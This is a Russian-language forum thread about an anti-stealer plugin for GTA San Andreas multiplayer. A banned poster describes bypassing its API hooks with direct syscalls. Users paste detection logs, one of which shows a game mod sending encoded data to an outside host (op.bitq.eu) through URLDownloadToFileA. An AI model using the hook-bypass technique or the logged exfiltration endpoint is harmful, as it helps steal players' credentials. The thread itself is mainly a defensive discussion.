Статус
В этой теме нельзя размещать новые ответы.

ЯedЯuM

Malware Maker
242
302
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
@DarkP1xel В антистиллере есть критическая уязвимость с системными вызовами а.к.а syscall / вызов шлюза на х86.
С их помощью можно вызывать функционал ядра системы в обход всех нынче существующих хуков, даже тех что в ntdll.dll
Рекомендую использовать syscall хуки, если память не изменяет то на х86 архитектуре для этого предназначена KiFastSystemCall (win xp / win 7).
А вот на более новые не помню, там что-то связанное с этим названием было но оно разное под х64 и х86.
Хочу добавить что мой предыдущий обход который ты нихуя и не пофиксил, как раз таки окончательно фиксится хуками системных вызовов)
Так же этот же хук пофиксит обход предложенный @Rinat_Namazov через ProxyDLL.
Это конечная цепочка в вызовах с UserMode, прямой доступ в ядро системы. (На этот раз без наёба? :thinking:)
 
Последнее редактирование:

ЯedЯuM

Malware Maker
242
302
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
  • Нравится
Реакции: #Northn

Twilight55

Новичок
2
0
DarkP1xel, а Ваш !0AntiStealerByDarkP1xel защищает от Trojan_Miner или TrojanPSW?
Заранее спасибо за ответ!
 

Clarence

Известный
77
6
Не юзаю ни эту, ни предыдущую версию, так как баг с Shadow Play не пофикшен.
Если еще не в курсе, то с этим АС шадик не работает в гта. Чтобы заработал, приходится каждый раз после запуска игры сворачивать ее и разворачивать. И только так все начинает работать.
 

Baron_King

Новичок
1
0
И что? Ловится твой файл.

4ee2e9f1e22c440b9fa138a972699ca8.png
у меня нету файла LOG или где он должен появиться
 

vase4kin3

Новичок
2
0
Что скажете?
[PATCHED] > [FindWindowA] > [D:\GTA San Andreas\SAMPFUNCS\WarningsByRaymond.sf] > {lpClassName: - | lpWindowName: GTA:SA:MP}
 

Clark_Morello

Участник
172
43
Эт' норм?
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [URLDownloadToFileA] > [E:\90K EDITION BY DAPO SHOW\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/op-hax/log.php?A=ادحا&B=؛چگ‘‍ ²‍–&C=&D=خبةرجحرجبرجبإبببب&E=حدخارخحدةكك×ڑŒإخجةة‡بةاضكك'گوٌGّôû | szFileName: E:\90K EDITION BY DAPO SHOW\log.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\SYSTEM32\urlmon.dll] > {szURL: http://op.bitq.eu/op-hax/log.php?A=
 

DGAYE

Новичок
18
1
Эт' норм?
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [URLDownloadToFileA] > [E:\90K EDITION BY DAPO SHOW\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/op-hax/log.php?A=ادحا&B=؛چگ‘‍ ²‍–&C=&D=خبةرجحرجبرجبإبببب&E=حدخارخحدةكك×ڑŒإخجةة‡بةاضكك'گوٌGّôû | szFileName: E:\90K EDITION BY DAPO SHOW\log.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\SYSTEM32\urlmon.dll] > {szURL: http://op.bitq.eu/op-hax/log.php?A=
по сути такого не должно быть
 
Статус
В этой теме нельзя размещать новые ответы.